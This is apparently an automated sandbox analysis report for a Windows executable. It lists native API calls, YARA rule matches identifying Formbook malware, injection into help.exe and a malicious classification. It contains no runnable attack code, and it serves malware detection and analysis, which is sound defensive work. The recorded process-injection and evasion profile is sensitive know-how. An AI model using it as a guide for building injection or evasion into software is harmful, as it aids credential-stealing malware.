          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041A05A NtClose,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041A10A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00419F2D NtCreateFile,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C095D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C098A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C0B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C099D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09A10 NtQuerySection,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C0A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C095F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09560 NtWriteFile,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C0AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C096D0 NtCreateKey,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09760 NtOpenProcess,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C0A770 NtOpenThread,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C0A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041A060 NtClose,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041A110 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00419F30 NtCreateFile,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00419FE0 NtReadFile,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041A05A NtClose,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041A10A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00419F2D NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0366A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0366B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0366A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0366A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669560 NtWriteFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0366AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321A110 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321A060 NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03219F30 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03219FE0 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321A10A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321A05A NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03219F2D NtCreateFile,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00404853
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00406131
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_73761A98
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041E206
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041DA32
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041D330
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041E46E
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00402D87
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00409E40
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041D666
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00409E3C
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF20A0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C928EC
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDB090
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C920A8
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA830
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81002
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9E824
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE4120
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCF900
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C922AE
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C7FA2B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFEBB0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C803DA
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8DBD2
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C723E3
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFABD8
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C92B28
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEAB40
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD841F
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8D466
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C925DD
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2581
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDD5E0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC0D20
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C91D55
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C92D07
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C92EF7
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE6E30
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8D616
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9DFCE
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C91FF1
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00401030
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041E206
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041DA32
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041D330
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041E46E
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00402D87
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00402D90
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00409E40
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041D666
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00409E3C
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00402FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364AB40
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F2B28
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E03DA
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036EDBD2
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365EBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036DFA2B
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F22AE
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03644120
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362F900
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036FE824
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A830
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E1002
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F28EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036520A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F20A8
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363B090
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F1FF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036FDFCE
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03646E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036ED616
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F2EF7
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F1D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03620D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F2D07
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F25DD
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03652581
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036ED466
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321D330
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321DA32
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321E206
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03202FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03209E3C
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321D666
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03209E40
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03202D87
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03202D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321E46E
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 0362B150 appears 72 times
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: String function: 00BCB150 appears 133 times
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: String function: 0041BDB0 appears 38 times
          Source: SX365783909782021.exe, 00000000.00000003.208364508.0000000009C4F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SX365783909782021.exe
          Source: SX365783909782021.exe, 00000002.00000002.258899247.0000000000769000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs SX365783909782021.exe
          Source: SX365783909782021.exe, 00000002.00000002.259254145.0000000000E4F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SX365783909782021.exe
          Source: SX365783909782021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@4/4
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_01
          Source: C:\Users\user\Desktop\SX365783909782021.exeFile created: C:\Users\user\AppData\Local\Temp\nsaD9FC.tmpJump to behavior
          Source: SX365783909782021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SX365783909782021.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SX365783909782021.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: SX365783909782021.exeVirustotal: Detection: 31%
          Source: SX365783909782021.exeReversingLabs: Detection: 39%
          Source: C:\Users\user\Desktop\SX365783909782021.exeFile read: C:\Users\user\Desktop\SX365783909782021.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SX365783909782021.exe 'C:\Users\user\Desktop\SX365783909782021.exe'
